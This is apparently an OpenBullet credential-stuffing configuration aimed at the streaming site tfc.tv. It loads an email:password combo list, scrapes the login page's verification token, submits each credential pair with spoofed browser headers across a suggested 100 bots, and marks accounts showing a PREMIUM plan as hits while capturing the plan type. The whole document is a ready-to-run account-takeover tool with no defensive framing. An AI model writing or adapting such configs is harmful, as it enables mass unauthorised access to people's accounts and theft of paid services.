[SETTINGS]
{
  "Name": "tfc.tv",
  "SuggestedBots": 100,
  "LastModified": "2018-06-14T12:27:58.1614781+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://tfc.tv/user/login" AutoRedirect=FALSE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "name=\"__RequestVerificationToken\" type=\"hidden\" value=\"" "\" /> <div " Recursive=FALSE -> VAR "TOKEN" "" "" 
REQUEST POST "https://tfc.tv/user/login" AutoRedirect=TRUE 
  CONTENT "__RequestVerificationToken=<TOKEN>&EMail=<USER>&Password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "referer: https://tfc.tv/" 
  HEADER "origin: https://tfc.tv" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "The email address provided is incorrect" 
    KEY "This account is not verified" 
    KEY "user_plan\">BASIC<" 
  KEYCHAIN Success OR 
    KEY "user_plan\">PREMIUM<" 
PARSE "<SOURCE>" CSS "[class=user_plan]" "innerHTML" 0 -> CAP "PLAN" "" "" 
